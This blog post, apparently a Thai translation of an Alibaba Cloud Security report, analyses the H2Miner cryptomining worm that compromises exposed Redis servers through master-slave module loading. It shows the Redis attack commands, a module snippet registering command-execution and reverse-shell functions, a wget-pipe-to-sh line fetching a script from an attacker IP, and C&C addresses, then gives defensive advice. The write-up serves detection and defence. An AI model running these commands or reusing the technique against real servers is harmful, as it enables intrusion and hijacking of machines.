โปรโฮสต์ > บล็อก > การบริหาร > มีการค้นพบการระบาดครั้งใหม่ของเวิร์ม H2Miner ซึ่งใช้ประโยชน์จาก Redis RCE

มีการค้นพบการระบาดครั้งใหม่ของเวิร์ม H2Miner ซึ่งใช้ประโยชน์จาก Redis RCE

เมื่อวันก่อน หนึ่งในเซิร์ฟเวอร์ของโปรเจ็กต์ของฉันถูกโจมตีโดยเวิร์มที่คล้ายกัน เพื่อค้นหาคำตอบของคำถามที่ว่า “นั่นมันอะไร?” ฉันพบบทความดีๆ จากทีมงาน Alibaba Cloud Security เนื่องจากฉันไม่พบบทความเกี่ยวกับHabré ฉันจึงตัดสินใจแปลบทความนี้สำหรับคุณโดยเฉพาะ <3

การเข้า

ล่าสุด ทีมรักษาความปลอดภัยของ Alibaba Cloud ค้นพบการระบาดอย่างกะทันหันของ H2Miner เวิร์มที่เป็นอันตรายประเภทนี้ใช้การขาดการอนุญาตหรือรหัสผ่านที่ไม่รัดกุมสำหรับ Redis เป็นเกตเวย์ไปยังระบบของคุณ หลังจากนั้นมันจะซิงโครไนซ์โมดูลที่เป็นอันตรายของตัวเองกับสเลฟผ่านการซิงโครไนซ์มาสเตอร์สเลฟ และสุดท้ายจะดาวน์โหลดโมดูลที่เป็นอันตรายนี้ไปยังเครื่องที่ถูกโจมตีและดำเนินการที่เป็นอันตราย คำแนะนำ.

ในอดีต การโจมตีระบบของคุณดำเนินการโดยใช้วิธีการที่เกี่ยวข้องกับงานที่กำหนดเวลาไว้หรือคีย์ SSH เป็นหลัก ซึ่งเขียนลงในเครื่องของคุณหลังจากที่ผู้โจมตีเข้าสู่ระบบ Redis โชคดีที่วิธีนี้ไม่สามารถใช้งานได้บ่อยเนื่องจากปัญหาในการควบคุมสิทธิ์หรือเนื่องจากเวอร์ชันของระบบที่แตกต่างกัน อย่างไรก็ตาม วิธีการโหลดโมดูลที่เป็นอันตรายนี้สามารถดำเนินการคำสั่งของผู้โจมตีได้โดยตรงหรือเข้าถึงเชลล์ ซึ่งเป็นอันตรายต่อระบบของคุณ

เนื่องจากมีเซิร์ฟเวอร์ Redis จำนวนมากที่โฮสต์บนอินเทอร์เน็ต (เกือบ 1 ล้านเครื่อง) ทีมรักษาความปลอดภัยของ Alibaba Cloud จึงขอเตือนอย่างเป็นมิตรว่าผู้ใช้อย่าแชร์ Redis ออนไลน์ และตรวจสอบความรัดกุมของรหัสผ่านเป็นประจำ และตรวจสอบดูว่ารหัสผ่านถูกบุกรุกหรือไม่ การเลือกอย่างรวดเร็ว

H2ไมเนอร์

H2Miner เป็นบอทเน็ตการขุดสำหรับระบบที่ใช้ Linux ซึ่งสามารถบุกรุกระบบของคุณได้หลายวิธี รวมถึงการขาดการอนุญาตในช่องโหว่ Hadoop Yarn, Docker และ Redis การดำเนินการคำสั่งระยะไกล (RCE) บ็อตเน็ตทำงานโดยการดาวน์โหลดสคริปต์ที่เป็นอันตรายและมัลแวร์เพื่อขุดข้อมูลของคุณ ขยายการโจมตีในแนวนอน และรักษาการสื่อสารคำสั่งและการควบคุม (C&C)

เรดิส RCE

Pavel Toporkov แบ่งปันความรู้เกี่ยวกับหัวข้อนี้ที่ ZeroNights 2018 หลังจากเวอร์ชัน 4.0 แล้ว Redis รองรับคุณสมบัติการโหลดปลั๊กอินที่ให้ผู้ใช้สามารถโหลดได้ ดังนั้นไฟล์ที่คอมไพล์ด้วย C ลงใน Redis เพื่อดำเนินการคำสั่ง Redis เฉพาะ ฟังก์ชันนี้แม้ว่าจะมีประโยชน์ แต่ก็มีช่องโหว่ที่ในโหมดมาสเตอร์-สเลฟ ไฟล์สามารถซิงโครไนซ์กับสเลฟผ่านโหมดฟูลรีซิงค์ได้ ผู้โจมตีสามารถใช้เพื่อถ่ายโอนไฟล์ที่เป็นอันตรายได้ หลังจากการถ่ายโอนเสร็จสิ้น ผู้โจมตีจะโหลดโมดูลไปยังอินสแตนซ์ Redis ที่ถูกโจมตีและดำเนินการคำสั่งใดๆ

การวิเคราะห์เวิร์มมัลแวร์

ล่าสุด ทีมรักษาความปลอดภัยของ Alibaba Cloud ค้นพบว่าขนาดของกลุ่มนักขุดที่เป็นอันตราย H2Miner ได้เพิ่มขึ้นอย่างมากในทันที จากการวิเคราะห์พบว่ากระบวนการโจมตีโดยทั่วไปมีดังนี้

มีการค้นพบการระบาดครั้งใหม่ของเวิร์ม H2Miner ซึ่งใช้ประโยชน์จาก Redis RCE

H2Miner ใช้ RCE Redis สำหรับการโจมตีเต็มรูปแบบ ผู้โจมตีจะโจมตีเซิร์ฟเวอร์ Redis ที่ไม่ได้รับการป้องกันหรือเซิร์ฟเวอร์ด้วยรหัสผ่านที่ไม่รัดกุมก่อน

จากนั้นพวกเขาก็ใช้คำสั่ง config set dbfilename red2.so เพื่อเปลี่ยนชื่อไฟล์ หลังจากนั้นผู้โจมตีจะรันคำสั่ง slaveof เพื่อตั้งค่าที่อยู่โฮสต์การจำลองแบบ master-slave

เมื่ออินสแตนซ์ Redis ที่ถูกโจมตีสร้างการเชื่อมต่อหลัก-รองกับ Redis ที่เป็นอันตรายซึ่งเป็นของผู้โจมตี ผู้โจมตีจะส่งโมดูลที่ติดไวรัสโดยใช้คำสั่ง fullresync เพื่อซิงโครไนซ์ไฟล์ จากนั้นไฟล์ red2.so จะถูกดาวน์โหลดไปยังเครื่องที่ถูกโจมตี ผู้โจมตีใช้โมดูลการโหลด ./red2.so เพื่อโหลดไฟล์ so นี้ โมดูลสามารถดำเนินการคำสั่งจากผู้โจมตีหรือเริ่มต้นการเชื่อมต่อแบบย้อนกลับ (ประตูหลัง) เพื่อเข้าถึงเครื่องที่ถูกโจมตี

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

หลังจากดำเนินการคำสั่งที่เป็นอันตรายเช่น / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1ผู้โจมตีจะรีเซ็ตชื่อไฟล์สำรองและยกเลิกการโหลดโมดูลระบบเพื่อล้างร่องรอย อย่างไรก็ตาม ไฟล์ red2.so จะยังคงอยู่ในเครื่องที่ถูกโจมตี ขอแนะนำให้ผู้ใช้ให้ความสนใจกับการมีอยู่ของไฟล์ที่น่าสงสัยดังกล่าวในโฟลเดอร์ของอินสแตนซ์ Redis ของตน

นอกเหนือจากการฆ่ากระบวนการที่เป็นอันตรายเพื่อขโมยทรัพยากรแล้ว ผู้โจมตียังติดตามสคริปต์ที่เป็นอันตรายด้วยการดาวน์โหลดและเรียกใช้ไฟล์ไบนารี่ที่เป็นอันตรายเพื่อ 142.44.191.122/เครือญาติ. ซึ่งหมายความว่าชื่อกระบวนการหรือชื่อไดเร็กทอรีที่มี kinsing บนโฮสต์อาจบ่งชี้ว่าเครื่องนั้นติดไวรัสนี้

ตามผลลัพธ์ทางวิศวกรรมย้อนกลับ มัลแวร์ส่วนใหญ่ทำหน้าที่ดังต่อไปนี้:

  • การอัพโหลดไฟล์และดำเนินการ
  • การขุด
  • รักษาการสื่อสารของ C&C และดำเนินการคำสั่งของผู้โจมตี

มีการค้นพบการระบาดครั้งใหม่ของเวิร์ม H2Miner ซึ่งใช้ประโยชน์จาก Redis RCE

ใช้ Masscan สำหรับการสแกนภายนอกเพื่อขยายอิทธิพลของคุณ นอกจากนี้ ที่อยู่ IP ของเซิร์ฟเวอร์ C&C จะถูกฮาร์ดโค้ดในโปรแกรม และโฮสต์ที่ถูกโจมตีจะสื่อสารกับเซิร์ฟเวอร์การสื่อสาร C&C โดยใช้คำขอ HTTP โดยที่ข้อมูลซอมบี้ (เซิร์ฟเวอร์ที่ถูกบุกรุก) จะถูกระบุในส่วนหัว HTTP

มีการค้นพบการระบาดครั้งใหม่ของเวิร์ม H2Miner ซึ่งใช้ประโยชน์จาก Redis RCE

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

วิธีการโจมตีอื่นๆ

มีการค้นพบการระบาดครั้งใหม่ของเวิร์ม H2Miner ซึ่งใช้ประโยชน์จาก Redis RCE

ที่อยู่และลิงก์ที่เวิร์มใช้

/เป็นญาติกัน

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

เอสแอนด์ซี

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

สภา

ประการแรก ไม่ควรเข้าถึง Redis จากอินเทอร์เน็ต และควรป้องกันด้วยรหัสผ่านที่รัดกุม สิ่งสำคัญคือไคลเอ็นต์ต้องตรวจสอบว่าไม่มีไฟล์ red2.so ในไดเร็กทอรี Redis และไม่มี "kinsing" ในชื่อไฟล์/กระบวนการบนโฮสต์

ที่มา: will.com

เพิ่มความคิดเห็น